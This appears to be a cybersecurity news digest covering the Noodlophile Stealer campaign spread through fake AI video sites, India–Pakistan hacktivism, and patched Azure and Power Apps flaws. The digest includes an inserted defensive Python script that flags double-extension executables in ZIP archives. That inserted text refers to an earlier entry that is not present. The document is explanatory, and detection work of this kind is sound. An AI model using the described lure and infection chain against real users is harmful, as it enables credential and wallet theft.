A new malware campaign is exploiting the hype surrounding artificial intelligence to distribute the Noodlophile Stealer, an information-stealing malware. Morphisec researcher Shmuel Uzan discovered that attackers are enticing victims with fake AI video generation tools advertised on social media platforms, particularly Facebook. These platforms masquerade as legitimate AI services for creating videos, logos, images, and even websites, attracting users eager to leverage AI for content creation.
Posts promoting these fake AI tools have garnered significant attention, with some reaching over 62,000 views. Users who click on the advertised links are directed to bogus websites, such as one impersonating CapCut AI, where they are prompted to upload images or videos. Instead of receiving the promised AI-generated content, users are tricked into downloading a malicious ZIP archive named "VideoDreamAI.zip," which contains an executable file designed to initiate the infection chain. The "Video Dream MachineAI.mp4.exe" file within the archive launches a legitimate binary associated with ByteDance's CapCut video editor, which is then used to execute a .NET-based loader. This loader, in turn, retrieves a Python payload from a remote server, ultimately leading to the deployment of the Noodlophile Stealer. This malware is capable of harvesting browser credentials, cryptocurrency wallet information, and other sensitive data. In some instances, the stealer is bundled with a remote access trojan like XWorm, enabling attackers to gain entrenched access to infected systems. Recommended read:
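The lure described in this item and in the earlier Noodlophile entry above comes down to one file-naming trick, so here is a single added example (not Morphisec's or the attackers' code) that serves both: an archive audit that catches a PE executable named with a media extension in front of .exe, together with the name Windows would display with extensions hidden. The archive is built in memory with a fake PE (just the MZ header bytes) so the check runs offline; the "Video Dream MachineAI.mp4.exe" name comes from the campaign description, the other members and the extension lists are constructed for the example.

```python
"""Added example, not Morphisec's or the attackers' code: inspect a ZIP
archive for the disguise used by the Noodlophile lure, an executable whose
name ends in a media extension followed by .exe, so that Windows' default
'hide extensions for known file types' setting shows it as a video.

Assumptions: the archive is built in memory with a fake PE ('MZ' header only);
the decoy/executable extension lists and the non-malicious members are
constructed; only the Video Dream MachineAI.mp4.exe name is from the page.
"""
import io
import zipfile

DECOY_EXTS = {".mp4", ".mov", ".avi", ".mkv", ".jpg", ".png", ".gif", ".pdf", ".txt"}
EXEC_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".js", ".vbs", ".lnk"}


def extension_chain(name: str) -> list[str]:
    """All dotted suffixes of the file name, lower-cased, e.g. ['.mp4', '.exe']."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def shown_name(name: str) -> str:
    """What Explorer displays with 'hide extensions for known file types' on:
    only the final extension disappears, so the decoy one stays visible."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[0] if "." in base else base


def is_disguised(name: str) -> bool:
    """True when the real (last) extension is executable and the one before
    it is a document or media type the user would take at face value."""
    exts = extension_chain(name)
    return len(exts) >= 2 and exts[-1] in EXEC_EXTS and exts[-2] in DECOY_EXTS


def looks_like_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


def audit_zip(blob: bytes) -> list[tuple[str, list[str]]]:
    """Return (member name, reasons) for every suspicious archive member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)
            reasons = []
            if is_disguised(info.filename):
                reasons.append(f"double extension; shown as {shown_name(info.filename)!r}")
            last = (extension_chain(info.filename) or [""])[-1]
            if looks_like_pe(head) and last not in EXEC_EXTS:
                reasons.append("PE header behind a non-executable extension")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip() -> bytes:
    """Constructed stand-in for the VideoDreamAI.zip lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("VideoDreamAI/Video Dream MachineAI.mp4.exe", b"MZ" + b"\x00" * 64)
        zf.writestr("VideoDreamAI/readme.txt", b"Thanks for using Video Dream AI")
        zf.writestr("VideoDreamAI/sample.mp4", b"\x00\x00\x00\x18ftypmp42")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in audit_zip(build_sample_zip()):
        print(member)
        for r in reasons:
            print("   ", r)
```

The second rule, content that starts with a PE header under a non-executable name, is there because the same campaign style sometimes relies on a later stage to rename or directly map the file; checking magic bytes rather than trusting the name catches both variants.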
References :
@cyble.com
//
In May 2025, cybersecurity experts reported a significant surge in hacktivist activity targeting Indian digital infrastructure. This wave of attacks followed the terror attack in Pahalgam, located in the Indian state of Jammu and Kashmir on April 22nd, and India’s retaliatory strikes across the border. A coordinated effort by more than 40 hacktivist groups sought to disrupt and deface numerous Indian websites, leading to widespread alarm across media and social networks as many claimed significant breaches of government, educational, and critical infrastructure websites.
However, detailed technical investigations revealed that the actual impact of these attacks on Indian cyber assets was minimal. Claims of major data breaches, such as a supposed 247 GB breach of the National Informatics Centre (NIC), were largely unfounded as the data was publicly available or fabricated. Website defacements and Distributed Denial of Service (DDoS) attacks, while numerous, were short-lived and ineffective. Despite the relatively low impact, the cyberattacks highlighted the ongoing tensions in cyberspace between India and Pakistan. Technisanct identified 36 pro-Pakistan hacktivist groups involved in the digital assaults, countered by 14 Indian groups retaliating. The escalation in hacktivist activity serves as a reminder of the persistent and evolving cyber threats facing both nations, even amidst military tensions. Recommended read:
References :
@securityonline.info
//
Microsoft has recently addressed several critical security vulnerabilities affecting its Azure cloud services and Microsoft Power Apps. The flaws, identified in Azure Automation, Azure Storage, Azure DevOps, and Microsoft Power Apps, highlighted the importance of proactive security measures within cloud-native development environments. One vulnerability, CVE-2025-29813, received the maximum Common Vulnerability Scoring System (CVSS) score of 10, indicating its severity.
The most critical vulnerability, found in Azure DevOps, allowed attackers with project-level access to escalate their privileges by exchanging short-term pipeline job tokens for long-term ones, potentially gaining extensive access within a project environment. Additional vulnerabilities included CVE-2025-29827 in Azure Automation, where improper authorization could enable a user to elevate privileges, CVE-2025-29972, an SSRF vulnerability in Azure Storage Resource Provider, and CVE-2025-47733 in Microsoft Power Apps, which allowed unauthorized information disclosure over a network through a Server-Side Request Forgery (SSRF). Despite the severity of these vulnerabilities, Microsoft has assured users that no action is required on their part. The company has already mitigated the flaws at the platform level, preventing potential exploitation. These patches underscore Microsoft's commitment to maintaining a secure cloud environment and highlight the ongoing need for robust security practices within cloud-native development. Recommended read:
References :